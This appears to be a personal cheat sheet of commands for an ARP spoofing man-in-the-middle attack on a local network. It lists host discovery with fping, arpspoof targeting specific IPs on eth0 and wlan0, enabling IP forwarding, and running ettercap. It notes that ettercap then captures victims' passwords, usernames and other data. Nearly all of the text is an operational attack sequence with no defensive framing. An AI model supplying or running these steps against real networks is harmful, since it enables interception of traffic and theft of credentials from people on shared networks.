arp attack
- synopsis
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.0.102 192.168.0.1 //arp attack
fping -asg 192.198.0.1/24 //inquire the ip addr on lan( local are network)
fping -g 192.168.0.1/24
echo 1 > /proc/sys/net/ipv4/ip_forward//ip data packets redirect
ettercap
- synopsis: If IPv6 is enabled:
TARGET is in the form MAC/IPs/IPv6/PORTs
Otherwise,
TARGET is in the form MAC/IPs/PORTs
where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)
ettercap -Tq -i eth0 //when arp attack succeeds, we can use ettercap to acquire the datas of the host ,such as password ,ip ,username etc.
---
ifconfig
fping -g 192.168.0.1/24
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.103
cd /proc/sys/net/ipv4
cat ip_forward
138 echo 1 > ip_forward
139 cat ip_forward
ettercap -Tq -i wlan0